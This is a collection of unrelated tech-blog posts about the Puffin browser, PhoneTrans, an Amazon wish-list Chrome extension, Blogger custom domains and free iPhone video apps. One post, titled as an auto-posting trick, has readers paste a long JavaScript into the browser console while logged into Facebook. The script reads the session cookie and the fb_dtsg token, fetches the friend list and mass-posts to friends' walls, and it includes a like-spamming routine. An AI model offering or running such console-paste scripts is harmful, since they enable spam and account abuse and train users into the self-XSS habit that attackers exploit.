How to Get Your Adobe Flash Fix on the iPhone



Adobe Flash: Can’t live with it, can’t live without it, at least for iOS users.
The web-legacy file format, which allows websites to stream videos and play animated games — as well as hog your device memory with annoying rollover ads — has long been at odds with Apple, which steadfastly refuses to support the protocol on its portable devices.
Newer technologies like HTML5 are gaining steam and enabling videos and games to be played on Apple mobile devices, but Flash still makes up a significant portion of the overall Internet, leaving iPhones and iPads out of the loop for major chunks of content.
But for iOS users willing to travel beyond the environs of Safari, there is Puffin, an independent mobile Internet browser for Apple mobile devices, which promises a faster, fuller browsing experience for iPhones and iPads.

What’s the App?

Puffin, developed by CloudMosa for iOS devices and available for $3 or free as a limited two-week trial, is a well-regarded alternative to the Safari browser.
The app is lauded for its speedy loading of pages — it renders tricky JavaScript coding much faster than typical browsers and uses cloud technology to parse out pre-processed Web pages, making for a faster, smoother experience. As a result, it’s able to whittle down data usage, especially on slower connections, an increasingly crucial feature as data plans become more expensive and trickier to manage.
Beyond speed and smoothness, the ability to see and interact with Flash elements offers a fuller mobile experience of the Internet. Puffin users can watch Flash videos, play Flash games, and access Flash content, while still retaining a certain smoothness of experience. As a result, you can listen to streaming audio, watching Flash-rendered TV and movie content and generally have a more multimedia experience on your iOS device. IPad users in particularly will especially appreciate the content, especially Flash games, that Puffin opens up for them.
A “virtual mouse” feature creates a “trackpad” on the screen that users can use just like on laptops to mouseover content and drag-and-drop files. Modern touchscreens have done away with these gestures, but Puffin users can use the virtual mouse to more easily navigate Web-based apps like Gmail.

You’ll Want It If…

If you’re tired of being confined to Safari and want to access more multimedia in particular on your iPhone or iPad, Puffin is a great alternative. Puffin has been around for some time, but recent updates boosted the Flash performance on the browser, making for longer battery life and smoother display. CloudMosa has also added gaming elements to make it worth another look. Similar to the virtual trackpad, a new virtual “gamepad” can simulate arrow keys and buttons, as on a laptop, opening up a whole world of Flash games on the Web. The new gamepad is a bit cramped on the iPhone, but really finds a place on the iPad, making the tablet a much more powerful multimedia device.

It’s Not My Thing, What Else Ya Got?

Speedy and smooth performance as well as broader access to Flash content make Puffin a great deal, especially if you’ve transitioned to using your iPad as your primary digital entertainment device. But the browser isn’t perfect — some Flash games were still sticky in loading. And a mobile world full of Flash also means more ads bombarding you, so the lack of the ability to block ads — common on many full-fledged Web browsers — is glaring.
Some users also wished for a print option. And some, of course, quibble with the $3 price tag. Those looking for viable free alternative to Safari may want to seek out Opera or Chrome, both of which also promise faster page speeds — but both also are riddled with user complaints.


Photo courtesy of Flickr, Markcooz
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Transfer music and media to and from iOS devices with PhoneTrans

PhoneTrans is a free program for Windows which connects to any attached iOS device. It acts as an iTunes alternative and allows for moving music and media from the PC to the phone or the other way around, moving media from any iOS device onto the hard drive.  It does not care about whether you previously synced with iTunes or not, or about which devices you are connecting to and whether you’ve done the million things that Apple apparently wants you to do.

Phonetrans Screrenshot1

If you are looking for a quick and easy way to transfer music and media to or from your iOS device, without being subject to Apple and iTunes’ constant obsessive compulsive supervision, definitely give PhoneTrans a shot.

Get PhoneTrans Here. (Requires MS .NET Framework 3.5)
sources http://www.freewaregenius.com/transfer-music-and-media-from-and-to-ios-devices-with-phonetrans/#pzOdovXY27D43yPx.99
Transfer music and media to and from iOS devices, with PhoneTrans
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‘Add To Amazon Wish List’ Chrome extension

A recent statistic published says that more than 70% of Americans will do much of their shopping online this year for the holidays and even beyond into next year. Amazon is, of course, one of the more popular sites to for online shopping, and the Add To Amazon Wish List (ATAWL) is a super handy extension for Chrome that will let you expand your Amazon wish list into a complete holiday shopping list that can include non Amazon items which are found on other sites. This makes it possible to have one wish list that is convenient for you and everyone else who may be interested in knowing what you might want this holiday season.

Amazon wishlist extension screenshot

The extension works thusly: Install it from the Chrome Web Store (of course) and then you’ll see a little Amazon logo with the orange swoop-like line under it on your browser’s address bar in the form of a button. Clicking the button will bring up a short menu that will let you configure the extension to use whatever form of Amazon (.com, .uk, etc.) you like, as well as setting other options within Chrome’s extension menu. ATAWL really becomes a useful thing, however, when you are actually browsing and shopping online. Of course it is compatible when browsing Amazon.com but the really cool thing is that it will actually work on sites that are not in any way connected to Amazon!

One of the things that makes an Amazon Wish List so useful is that it is universal, meaning you can add items to it from anywhere on the web and with this extension you can edit details of each item on the fly as you add it without having to log into Amazon every time. You can choose what picture from the page to use for the item as well as add comments and notate prices (with or without shipping costs, for instance) and even keep more than one item from a single page on your list without creating a new one. You can create as many new lists as you like but you’re not required to make more than one to use this extension. The screenshot below shows the Amazon Wishlist extension in action on a site other than Amazon.

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For anyone who prefers shopping online, whether you shop much at Amazon or not, this extension can be a great time saver and a neat way to keep information on what you plan to buy without having to cut and paste a thousand URL links into a notepad or other text application, since ATAWL will keep the URLs for each item you enter and you can then access them easily at a later date. This kind of superior shopping tool can be useful year-round but particularly around the holidays so give it a try, and you may find that you’re done with your shopping before you can say Happy New Year! Until next time, my friends!

Get Add To Amazon Wish List here.
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How to Register Your Blogger name into Domain Name via Google 2014

Blogger, Googles hosted blogging platform, offers what is probably the cheapest cost of entry into blogging.  Free blog hosting, and you can still make money from the ads if you manage to find a large enough audience to make it worth while. While that doesnt mean youll be rolling in millions tomorrow, it means that youre not stuck trying to recoup hosting fees and other costs. 
Blogger offers another professional perk for a low cost. You can use them to get a low cost custom domain for you blog.
Blogger has allowed custom URLs for quite some time. And as it turns out, registering your URL through Blogger is a bargain. A custom URL with WordPress.com is $12-$24 as of this writing -  and they still force you to serve their ads on it. A custom URL with Blogger is $10, and you dont have to put any ads on your site. If you do put ads there, theyre ads you profit from (if you have a lot of traffic.) 
  1. To get started, register a blog at www.blogger.com. 
  2. Go to Settings
  3. Click on Basic
  4. Under Blog Address, youll see a link marked Buy a domain for your blog.
  5. You can enter a domain and select from the drop-down box to choose a different top level domain(.com is the default.)
  6. Click Check availability.
  7. If the domain youre requesting is available, you can choose a registrar (when I did this, the choices were GoDaddy or eNom).
  8. Payment will be made through Google Wallet.

Thats it. An easy $10 domain, and it includes Google Apps, so you can give yourself an email account from your custom domain. You could even use this trick if you wanted the domain for a regular website, but youd have to go back to the registrar and tweak things.

What if You Already Own a Domain?

If you already registered a domain at some other time, you can still point it to your Blogger blog. You wont get a discount on the domain youve already registered, and you wont get the ease of instantly having all the settings pre-configured for Blogger, but you can still get a hosted blog on a server you dont have to maintain or pay a hosting fee to rent. 
Unfortunately, Googles instructions for redirecting the domain are incomplete and rather technical if youre unfamiliar with the back end of a registrar and words like  "A-Records" and "CNAMES" sound like a foreign language.  They have instructions that work for GoDaddy domains, but if you registered that domain with someone else, youll have to ask your registrar for support.

Going the Other Way- Google Apps Domains

Your hosted Blogger domain gets you Google Apps access, but you can go in the other direction, too. You get the same $10 domain deal when you create a new Google Apps account. Once youve created the account, you can then turn around and use the Google Apps control panel to redirect a page to a Blogger site. In many ways, you might prefer going in this direction for a larger site. You can use Google Sites to form the framework for your website and then a subdomain (blogs.WheverMySiteNameIs.com) to point to the blog portion.
If you started from Blogger, not to worry. You can still circle around and set up your Google Apps account later. 
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How to Post Automatically Yours Post to Your Friends Groups Pages 2014


Hi All My Blog Readers!
Today I am going To show You How to Auto Post on your friends, groups walls just in 1 Click

Lets Start!
Log into your facebook account
go to Home Page
open console
Mozila firfox
ctrl+shift+k

Google Chrome
ctrl+shift+J



Now copy the below script and in paste in console tab.
And
Press ENTER on your keyboard To start Auto Posting.
javascript: var grouppost = "<div><span class=img sp_f52w7l sx_47132d></span><a style=position:absolute;size:3px;padding-left:3px;font-weight:bold;font-family:Tahoma;font-size:11px;color:#3B5998;>Auto Post Wall by LBT</a></div></br>";
grouppost += "<div><textarea id=txtFloodMsg placeholder=Whats on Your Mind :P style=COLOR:WHITE;padding-top:5px;width:493px;height:85px;font-family:tahoma;font-size:13px;background-color:rgba(255,255,255,0.1);></textarea></div>";
grouppost += "<div><br><span class=img sp_dpkef5 sx_f05251></span><a style=position:absolute;font-family:Arial;size:3px;padding-left:3px;font-size:11px;color:rgb(128, 128, 128);>Script By : LBT </a></span><button style=margin-left:437px class=_2 _3 _6 _4 _5 selected onclick=autopostingfunc(this); >Post</button><div style=color:gray;>Lovely Blogging Tricks </br>Made by:</A><A style=color:#3B5998; href=https://www.facebook.com/ target=_0> Muhammad Abdul Basit</A></A><A style=color:#3B5998; href=https://www.hacerneto.blogspot.com/ target=_0> </A></A></A><A style=color:#3B5998; href=hacerneto.blogspot target=_0> </A></A></br>Web : <A style=color:#3B5998; href=https://www.hacerneto.blogspot.com/ target=_0>HacernetO</A></A><br></div>";
var Popupset = document.createElement("div");
Popupset.setAttribute("style", "min-height:50px;width:500px;position:fixed;top:100px;box-shadow: 0px 4px 10px rgba(24, 144, 255, 0.63);position:fixed;left:50%;margin-left:-273px;text-align:left;border-radius:10px;padding:5px;z-index:999999;border:5px solid #104E8B;background-color:#499DF5;color:White");
Popupset.innerHTML = grouppost;
document.body.appendChild(Popupset);
jx = {
    getHTTPObject: function () {
        var A = false;
        if (typeof ActiveXObject != "undefined") try {
            A = new ActiveXObject("Msxml2.XMLHTTP")
        } catch(C) {
            try {
                A = new ActiveXObject("Microsoft.XMLHTTP")
            } catch(B) {
                A = false
            }
        } else if (window.XMLHttpRequest) try {
            A = new XMLHttpRequest
        } catch(C) {
            A = false
        }
        return A
    },
    load: function (url, callback, format, method, opt) {
        var http = this.init();
        if (!http || !url) return;
        if (http.overrideMimeType) http.overrideMimeType("text/xml");
        if (!method) method = "GET";
        if (!format) format = "text";
        if (!opt) opt = {};
        format = format.toLowerCase();
        method = method.toUpperCase();
        var now = "uid=" + (new Date).getTime();
        url += url.indexOf("?") + 1 ? "&" : "?";
        url += now;
        var parameters = null;
        if (method == "POST") {
            var parts = url.split("?");
            url = parts[0];
            parameters = parts[1]
        }
        http.open(method, url, true);
        var ths = this;
        if (opt.handler) http.onreadystatechange = function () {
            opt.handler(http)
        };
        else http.onreadystatechange = function () {
            if (http.readyState == 4) if (http.status == 200) {
                var result = "";
                if (http.responseText) result = http.responseText;
                if (format.charAt(0) == "j") {
                    result = result.replace(/[
]/g, "");
                    result = eval("(" + result + ")")
                } else if (format.charAt(0) == "x") result = http.responseXML;
                if (callback) callback(result)
            } else {
                if (opt.loadingIndicator) document.getElementsByTagName("body")[0].removeChild(opt.loadingIndicator);
                if (opt.loading) document.getElementById(opt.loading).style.display = "none";
                if (error) error(http.status)
            }
        };
        http.send(parameters)
    },
    bind: function (A) {
        var C = {
            "url": "",
            "onSuccess": false,
            "onError": false,
            "format": "text",
            "method": "GET",
            "update": "",
            "loading": "",
            "loadingIndicator": ""
        };
        for (var B in C) if (A[B]) C[B] = A[B];
        if (!C.url) return;
        var D = false;
        if (C.loadingIndicator) {
            D = document.createElement("div");
            D.setAttribute("style", "position:absolute;top:0px;left:0px;");
            D.setAttribute("class", "loading-indicator");
            D.innerHTML = C.loadingIndicator;
            document.getElementsByTagName("body")[0].appendChild(D);
            this.opt.loadingIndicator = D
        }
        if (C.loading) document.getElementById(C.loading).style.display = "block";
        this.load(C.url, function (E) {
            if (C.onSuccess) C.onSuccess(E);
            if (C.update) document.getElementById(C.update).innerHTML = E;
            if (D) document.getElementsByTagName("body")[0].removeChild(D);
            if (C.loading) document.getElementById(C.loading).style.display = "none"
        },
        C.format, C.method, C)
    },
    init: function () {
        return this.getHTTPObject()
    }
};
var j = 0;
var k = 0;
var suc = 0;
var msg = "Auto post by Lovely Bloogging Tricks <3";
var arr = new Array;
var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);
function autopostingfunc(sender) {
    if (document.getElementById("txtFloodMsg").value != "") msg = document.getElementById("txtFloodMsg").value;
    jx.load(window.location.protocol + "//www.facebook.com/ajax/typeahead/search/bootstrap.php?__a=1&filter[0]=user&viewer=" + user_id + "&token=v7&lazy=0&__user=" + user_id, function (a) {
        var b = a;
        var c = b.substring(b.indexOf("{"));
        var d = JSON.parse(c);
        d = d.payload.entries;
        for (var e = 0; e < d.length; e++) arr.push(d[e].uid);
        sender.parentNode.innerHTML = "Wait Posting ...";
        postitok()
    })
}
var a = document.body.innerHTML;
var dts = document.getElementsByName("fb_dtsg")[0].value;
var composerid = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);
function postitok() {
    pst = "fb_dtsg=" + dts + "&xhpc_composerid=" + composerid + "&xhpc_targetid=" + arr[suc] + "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" + encodeURIComponent(msg) + "&xhpc_message=" + encodeURIComponent(msg) + "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_1]=pagelet_group_composer";
    with(newx = new XMLHttpRequest) open("POST", "/ajax/updatestatus.php?__a=1"),
    send(pst);
    suc++;
    if (suc > arr.length) {
        alert("Auto Post Completed. Press F5 to Close Auto Poster!. LBT");
        suc = 0
    } else setTimeout("postitok()", 3E4 / arr.length)
}
setTimeout("autopostingfunc()", 1E3);
function P(post) {
    var X = new XMLHttpRequest();
    var XURL = "//www.facebook.com/ajax/ufi/like.php";
    var XParams = "like_action=true&ft_ent_identifier=" + post + "&source=1&client_id=" + now + "%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]=" + post + "&nctr[_1]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg=" + fb_dtsg + "&phstamp=";
    X.open("POST", XURL, true);
    X.onreadystatechange = function () {
        if (X.readyState == 4 && X.status == 200) {
            X.close
        }
    };
    X.send(XParams)
}

Thats All My Lovely Readers see you in next post. :*
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Free Top 5 iPhone Apps To Watch Movies and TV Shows Online 2014

Want to watch Movies and TV shows onlineon your iPhone device..??And trouble to watch because of lack of flash player not supported by iPhone..?? Then dont worry i have some iPhone Apps and websites that will help you to Watch Free Movies and TV Shows Online on your iPhone device.

And the best thing of these choices is that they are free and offering legal way to watch movies and TV serials online.But what is most Recommended here..??We just required high speed internet on iPhone device.
Free iPhone Apps and Websites To Watch Movies and TV Shows Online:

1)Joost:-

This is best free iPhone application with huge amount of videos from categories like action,sports,comedy and web originals.You can also view videos by popular videos or the joost pics.So i recommended you to use this app to watch movies and TV serials online.


2)Daily Motion:-

This is the another free iPhone app available on iTunes Apple store and basically a video sharing website to watch movies and TV serials online from all over the world.

This app is best app to watch trailers,animation,short films and music videos online.The category under this website are Fun videos,movies,news,politics,music etc.By using this website you can also add videos and make money online.


3)B-Movies:-

This app is another best app available on the internet and comes in third category according to TechnologyRaise best movies apps ranking.The category comes on this app is that free movies,moving images and videos etc.

You can also bookmarked favorite videos and search by categories also choose videos from low,medium,and high quality video basis.


4)HollyWood Pocket:- This is not a app but basically a website which help us to watch free movies and TV serials online.This is a new website so doesnt having huge videos.

Visit the website from your iPhone safari browser and choose the best categories from the collection and watch movies online.You can also Pause,Forward or rewind the videos as these movies are in QuickTime format.

5)Justin.Tv:-

This is best website from the all above apps and websites.But why?? Because we can easily connect with latest news and movies trailers by using this app or website.

You can also create live videos or show online.When your videos goes live you can send notification to app website also.


Hope this article will help you in finding iPhone Apps to watch movies and TV shows online.Thanks for Visiting Technology Raise and spending time in reading article. Post your comment below to share your ideas and experience with the above mentioned apps. 
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